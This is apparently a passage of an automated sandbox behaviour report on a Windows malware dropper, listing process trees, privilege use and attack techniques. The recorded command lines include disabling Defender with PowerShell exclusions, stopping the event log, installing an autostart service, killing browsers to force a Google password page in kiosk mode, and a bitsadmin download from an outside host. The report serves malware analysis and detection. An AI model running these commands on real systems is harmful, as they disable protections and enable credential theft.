4572	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
1128	rapes.exe
1128	rapes.exe
2132	06444ff627.exe
2132	06444ff627.exe
3920	rapes.exe
3920	rapes.exe
1252	2fb82efe10.exe
1252	2fb82efe10.exe
1924	7f28b9078c.exe
1924	7f28b9078c.exe
1924	7f28b9078c.exe
1924	7f28b9078c.exe
4632	e995614d26.exe
4632	e995614d26.exe
4632	e995614d26.exe
4632	e995614d26.exe
4632	e995614d26.exe
4632	e995614d26.exe
640	e0e6a0a986.exe
640	e0e6a0a986.exe
4612	rapes.exe
4612	rapes.exe
2056	03afcae3d4.exe
2056	03afcae3d4.exe
640	e0e6a0a986.exe
640	e0e6a0a986.exe
640	e0e6a0a986.exe
640	e0e6a0a986.exe
1816	ac52c9b182.exe
1816	ac52c9b182.exe
2056	03afcae3d4.exe
2056	03afcae3d4.exe
2056	03afcae3d4.exe
2056	03afcae3d4.exe
3128	d589453c73.exe
3128	d589453c73.exe
3128	d589453c73.exe
3128	d589453c73.exe
5256	1b2099865d.exe
5256	1b2099865d.exe
5256	1b2099865d.exe
5256	1b2099865d.exe
5256	1b2099865d.exe
5628	v6Oqdnc.exe
5628	v6Oqdnc.exe
5716	FZJ598DYGU8NGCWNA.exe
5716	FZJ598DYGU8NGCWNA.exe
5628	v6Oqdnc.exe
5628	v6Oqdnc.exe
5628	v6Oqdnc.exe
5628	v6Oqdnc.exe
5164	OEHBOHk.exe
2124	powershell.exe
2124	powershell.exe
2124	powershell.exe
5164	OEHBOHk.exe
5164	OEHBOHk.exe
5164	OEHBOHk.exe
5164	OEHBOHk.exe
5164	OEHBOHk.exe
5164	OEHBOHk.exe
5164	OEHBOHk.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
3524	SplashWin.exe

Suspicious use of AdjustPrivilegeToken 28 IoCs

description	pid	Process
Token: SeDebugPrivilege	4832	7f28b9078c.exe
Token: SeDebugPrivilege	3988	taskkill.exe
Token: SeDebugPrivilege	4904	taskkill.exe
Token: SeDebugPrivilege	1996	taskkill.exe
Token: SeDebugPrivilege	5016	taskkill.exe
Token: SeDebugPrivilege	4068	taskkill.exe
Token: SeDebugPrivilege	4440	firefox.exe
Token: SeDebugPrivilege	4440	firefox.exe
Token: SeDebugPrivilege	5256	1b2099865d.exe
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeShutdownPrivilege	6080	powercfg.exe
Token: SeCreatePagefilePrivilege	6080	powercfg.exe
Token: SeShutdownPrivilege	6016	powercfg.exe
Token: SeCreatePagefilePrivilege	6016	powercfg.exe
Token: SeShutdownPrivilege	6084	powercfg.exe
Token: SeCreatePagefilePrivilege	6084	powercfg.exe
Token: SeShutdownPrivilege	6072	powercfg.exe
Token: SeCreatePagefilePrivilege	6072	powercfg.exe
Token: SeDebugPrivilege	5940	powershell.exe
Token: SeShutdownPrivilege	1052	powercfg.exe
Token: SeCreatePagefilePrivilege	1052	powercfg.exe
Token: SeShutdownPrivilege	6088	powercfg.exe
Token: SeCreatePagefilePrivilege	6088	powercfg.exe
Token: SeShutdownPrivilege	5424	powercfg.exe
Token: SeCreatePagefilePrivilege	5424	powercfg.exe
Token: SeLockMemoryPrivilege	3576	explorer.exe
Token: SeShutdownPrivilege	1784	powercfg.exe
Token: SeCreatePagefilePrivilege	1784	powercfg.exe

Suspicious use of FindShellTrayWindow 32 IoCs

pid	Process
3128	d589453c73.exe
3128	d589453c73.exe
3128	d589453c73.exe
3128	d589453c73.exe
3128	d589453c73.exe
3128	d589453c73.exe
3128	d589453c73.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
3128	d589453c73.exe
3128	d589453c73.exe
3128	d589453c73.exe
3128	d589453c73.exe

Suspicious use of SendNotifyMessage 31 IoCs

pid	Process
3128	d589453c73.exe
3128	d589453c73.exe
3128	d589453c73.exe
3128	d589453c73.exe
3128	d589453c73.exe
3128	d589453c73.exe
3128	d589453c73.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
4440	firefox.exe
3128	d589453c73.exe
3128	d589453c73.exe
3128	d589453c73.exe
3128	d589453c73.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4440	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4572 wrote to memory of 1128	4572	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe	90
PID 4572 wrote to memory of 1128	4572	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe	90
PID 4572 wrote to memory of 1128	4572	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe	90
PID 1128 wrote to memory of 2132	1128	rapes.exe	103
PID 1128 wrote to memory of 2132	1128	rapes.exe	103
PID 1128 wrote to memory of 2132	1128	rapes.exe	103
PID 1128 wrote to memory of 4832	1128	rapes.exe	104
PID 1128 wrote to memory of 4832	1128	rapes.exe	104
PID 1128 wrote to memory of 4832	1128	rapes.exe	104
PID 4832 wrote to memory of 2316	4832	7f28b9078c.exe	105
PID 4832 wrote to memory of 2316	4832	7f28b9078c.exe	105
PID 4832 wrote to memory of 2316	4832	7f28b9078c.exe	105
PID 4832 wrote to memory of 3912	4832	7f28b9078c.exe	106
PID 4832 wrote to memory of 3912	4832	7f28b9078c.exe	106
PID 4832 wrote to memory of 3912	4832	7f28b9078c.exe	106
PID 4832 wrote to memory of 1924	4832	7f28b9078c.exe	107
PID 4832 wrote to memory of 1924	4832	7f28b9078c.exe	107
PID 4832 wrote to memory of 1924	4832	7f28b9078c.exe	107
PID 4832 wrote to memory of 1924	4832	7f28b9078c.exe	107
PID 4832 wrote to memory of 1924	4832	7f28b9078c.exe	107
PID 4832 wrote to memory of 1924	4832	7f28b9078c.exe	107
PID 4832 wrote to memory of 1924	4832	7f28b9078c.exe	107
PID 4832 wrote to memory of 1924	4832	7f28b9078c.exe	107
PID 4832 wrote to memory of 1924	4832	7f28b9078c.exe	107
PID 2132 wrote to memory of 4236	2132	06444ff627.exe	112
PID 2132 wrote to memory of 4236	2132	06444ff627.exe	112
PID 2132 wrote to memory of 4236	2132	06444ff627.exe	112
PID 2132 wrote to memory of 4236	2132	06444ff627.exe	112
PID 2132 wrote to memory of 4236	2132	06444ff627.exe	112
PID 2132 wrote to memory of 4236	2132	06444ff627.exe	112
PID 2132 wrote to memory of 4236	2132	06444ff627.exe	112
PID 2132 wrote to memory of 4236	2132	06444ff627.exe	112
PID 2132 wrote to memory of 4236	2132	06444ff627.exe	112
PID 2132 wrote to memory of 4236	2132	06444ff627.exe	112
PID 1128 wrote to memory of 1252	1128	rapes.exe	117
PID 1128 wrote to memory of 1252	1128	rapes.exe	117
PID 1128 wrote to memory of 1252	1128	rapes.exe	117
PID 1252 wrote to memory of 1232	1252	2fb82efe10.exe	119
PID 1252 wrote to memory of 1232	1252	2fb82efe10.exe	119
PID 1252 wrote to memory of 1232	1252	2fb82efe10.exe	119
PID 1252 wrote to memory of 1232	1252	2fb82efe10.exe	119
PID 1252 wrote to memory of 1232	1252	2fb82efe10.exe	119
PID 1252 wrote to memory of 1232	1252	2fb82efe10.exe	119
PID 1252 wrote to memory of 1232	1252	2fb82efe10.exe	119
PID 1252 wrote to memory of 1232	1252	2fb82efe10.exe	119
PID 1252 wrote to memory of 1232	1252	2fb82efe10.exe	119
PID 1252 wrote to memory of 1232	1252	2fb82efe10.exe	119
PID 1128 wrote to memory of 4632	1128	rapes.exe	120
PID 1128 wrote to memory of 4632	1128	rapes.exe	120
PID 1128 wrote to memory of 4632	1128	rapes.exe	120
PID 1128 wrote to memory of 640	1128	rapes.exe	126
PID 1128 wrote to memory of 640	1128	rapes.exe	126
PID 1128 wrote to memory of 640	1128	rapes.exe	126
PID 1128 wrote to memory of 2056	1128	rapes.exe	130
PID 1128 wrote to memory of 2056	1128	rapes.exe	130
PID 1128 wrote to memory of 2056	1128	rapes.exe	130
PID 1128 wrote to memory of 1816	1128	rapes.exe	131
PID 1128 wrote to memory of 1816	1128	rapes.exe	131
PID 1128 wrote to memory of 1816	1128	rapes.exe	131
PID 1128 wrote to memory of 3128	1128	rapes.exe	133
PID 1128 wrote to memory of 3128	1128	rapes.exe	133
PID 1128 wrote to memory of 3128	1128	rapes.exe	133
PID 3128 wrote to memory of 3988	3128	d589453c73.exe	134
PID 3128 wrote to memory of 3988	3128	d589453c73.exe	134

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
"C:\Users\Admin\AppData\Local\Temp\0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4572
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1128
- - C:\Users\Admin\AppData\Local\Temp\10105090101\06444ff627.exe
    "C:\Users\Admin\AppData\Local\Temp\10105090101\06444ff627.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2132
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Downloads MZ/PE file
      System Location Discovery: System Language Discovery
      PID:4236
- - C:\Users\Admin\AppData\Local\Temp\10105100101\7f28b9078c.exe
    "C:\Users\Admin\AppData\Local\Temp\10105100101\7f28b9078c.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4832
  - - C:\Users\Admin\AppData\Local\Temp\10105100101\7f28b9078c.exe
      "C:\Users\Admin\AppData\Local\Temp\10105100101\7f28b9078c.exe"
      4⤵
      Executes dropped EXE
      PID:2316
  - - C:\Users\Admin\AppData\Local\Temp\10105100101\7f28b9078c.exe
      "C:\Users\Admin\AppData\Local\Temp\10105100101\7f28b9078c.exe"
      4⤵
      Executes dropped EXE
      PID:3912
  - - C:\Users\Admin\AppData\Local\Temp\10105100101\7f28b9078c.exe
      "C:\Users\Admin\AppData\Local\Temp\10105100101\7f28b9078c.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1924
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 824
      4⤵
      Program crash
      PID:2548
- - C:\Users\Admin\AppData\Local\Temp\10105110101\2fb82efe10.exe
    "C:\Users\Admin\AppData\Local\Temp\10105110101\2fb82efe10.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1252
  - - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
      "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
      4⤵
      Downloads MZ/PE file
      System Location Discovery: System Language Discovery
      PID:1232
- - C:\Users\Admin\AppData\Local\Temp\10105120101\e995614d26.exe
    "C:\Users\Admin\AppData\Local\Temp\10105120101\e995614d26.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4632
- - C:\Users\Admin\AppData\Local\Temp\10105130101\e0e6a0a986.exe
    "C:\Users\Admin\AppData\Local\Temp\10105130101\e0e6a0a986.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:640
- - C:\Users\Admin\AppData\Local\Temp\10105140101\03afcae3d4.exe
    "C:\Users\Admin\AppData\Local\Temp\10105140101\03afcae3d4.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:2056
  - - C:\Users\Admin\AppData\Local\Temp\FZJ598DYGU8NGCWNA.exe
      "C:\Users\Admin\AppData\Local\Temp\FZJ598DYGU8NGCWNA.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:5716
- - C:\Users\Admin\AppData\Local\Temp\10105150101\ac52c9b182.exe
    "C:\Users\Admin\AppData\Local\Temp\10105150101\ac52c9b182.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1816
- - C:\Users\Admin\AppData\Local\Temp\10105160101\d589453c73.exe
    "C:\Users\Admin\AppData\Local\Temp\10105160101\d589453c73.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3128
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM firefox.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3988
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM chrome.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4904
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM msedge.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1996
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM opera.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5016
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM brave.exe /T
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4068
  - - C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
      4⤵
      PID:632
    - - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:4440
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2012 -parentBuildID 20240401114208 -prefsHandle 1936 -prefMapHandle 1928 -prefsLen 27446 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {65a641d9-0533-48d3-bd13-3e9e7e4a7316} 4440 "\\.\pipe\gecko-crash-server-pipe.4440" gpu
        6⤵
        
        PID:1432
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2468 -parentBuildID 20240401114208 -prefsHandle 2460 -prefMapHandle 2456 -prefsLen 28366 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {531955e1-9a27-47a0-97eb-c6a4e165c631} 4440 "\\.\pipe\gecko-crash-server-pipe.4440" socket
        6⤵
        
        PID:3856
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1308 -childID 1 -isForBrowser -prefsHandle 3168 -prefMapHandle 3164 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {28999db1-33e4-4d23-bea0-8faed6a74fc3} 4440 "\\.\pipe\gecko-crash-server-pipe.4440" tab
        6⤵
        
        PID:464
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3880 -childID 2 -isForBrowser -prefsHandle 3892 -prefMapHandle 3888 -prefsLen 32856 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4c86c94d-8475-4053-ba48-2dd67ea224f5} 4440 "\\.\pipe\gecko-crash-server-pipe.4440" tab
        6⤵
        
        PID:64
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4524 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4516 -prefMapHandle 4508 -prefsLen 32856 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d658912b-2387-41dc-8eb6-d5b3c82fc4fa} 4440 "\\.\pipe\gecko-crash-server-pipe.4440" utility
        6⤵
        Checks processor information in registry
        
        PID:5492
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5372 -childID 3 -isForBrowser -prefsHandle 5364 -prefMapHandle 5360 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {151e2c57-e097-4fb8-9401-cf2fda72dbcd} 4440 "\\.\pipe\gecko-crash-server-pipe.4440" tab
        6⤵
        
        PID:6096
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5564 -childID 4 -isForBrowser -prefsHandle 5644 -prefMapHandle 5640 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d4b4f86-2d94-4814-9173-9598be810147} 4440 "\\.\pipe\gecko-crash-server-pipe.4440" tab
        6⤵
        
        PID:6116
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5652 -childID 5 -isForBrowser -prefsHandle 5764 -prefMapHandle 5772 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1260 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dda6b8c8-2829-4cf6-9c2b-2331b63c1a15} 4440 "\\.\pipe\gecko-crash-server-pipe.4440" tab
        6⤵
        
        PID:6136
- - C:\Users\Admin\AppData\Local\Temp\10105170101\1b2099865d.exe
    "C:\Users\Admin\AppData\Local\Temp\10105170101\1b2099865d.exe"
    3⤵
    - Modifies Windows Defender DisableAntiSpyware settings
    - Modifies Windows Defender Real-time Protection settings
    - Modifies Windows Defender TamperProtection settings
    - Modifies Windows Defender notification settings
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Windows security modification
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5256
- - C:\Users\Admin\AppData\Local\Temp\10105180101\v6Oqdnc.exe
    "C:\Users\Admin\AppData\Local\Temp\10105180101\v6Oqdnc.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5628
- - C:\Users\Admin\AppData\Local\Temp\10105190101\OEHBOHk.exe
    "C:\Users\Admin\AppData\Local\Temp\10105190101\OEHBOHk.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:5164
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2124
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:5996
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:4428
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:6016
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:6080
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:6084
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:6072
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "DWENDQPG"
      4⤵
      Launches sc.exe
      PID:6068
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "DWENDQPG" binpath= "C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:1760
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:3060
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "DWENDQPG"
      4⤵
      Launches sc.exe
      PID:3352
- - C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe
    "C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2912
  - - C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe
      "C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe"
      4⤵
      Executes dropped EXE
      PID:5112
  - - C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe
      "C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe"
      4⤵
      Executes dropped EXE
      PID:4436
  - - C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe
      "C:\Users\Admin\AppData\Local\Temp\10105200101\MCxU5Fj.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1328
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 816
      4⤵
      Program crash
      PID:5332
- - C:\Users\Admin\AppData\Local\Temp\10105210101\Y87Oyyz.exe
    "C:\Users\Admin\AppData\Local\Temp\10105210101\Y87Oyyz.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4860
  - - C:\Windows\Temp\{059B6C02-0FAC-44D4-8315-4FC91A65BB91}\.cr\Y87Oyyz.exe
      "C:\Windows\Temp\{059B6C02-0FAC-44D4-8315-4FC91A65BB91}\.cr\Y87Oyyz.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10105210101\Y87Oyyz.exe" -burn.filehandle.attached=536 -burn.filehandle.self=544
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:6068
    - - C:\Windows\Temp\{D8BFAA1C-A55B-418E-BD3E-5ACA5579161A}\.ba\SplashWin.exe
        
        C:\Windows\Temp\{D8BFAA1C-A55B-418E-BD3E-5ACA5579161A}\.ba\SplashWin.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3880
      - C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
        
        C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:3524
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4944
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10105221121\fCsM05d.cmd"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5456
  - - C:\Windows\SysWOW64\fltMC.exe
      fltmc
      4⤵
      System Location Discovery: System Language Discovery
      PID:952
  - - C:\Windows\SysWOW64\bitsadmin.exe
      bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\Admin\AppData\Local\Temp\vrep_install\vrep.msi"
      4⤵
      Download via BitsAdmin
      System Location Discovery: System Language Discovery
      PID:4400
- - C:\Users\Admin\AppData\Local\Temp\10105230101\zY9sqWs.exe
    "C:\Users\Admin\AppData\Local\Temp\10105230101\zY9sqWs.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:3692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4832 -ip 4832
1⤵
PID:3576

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3920

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
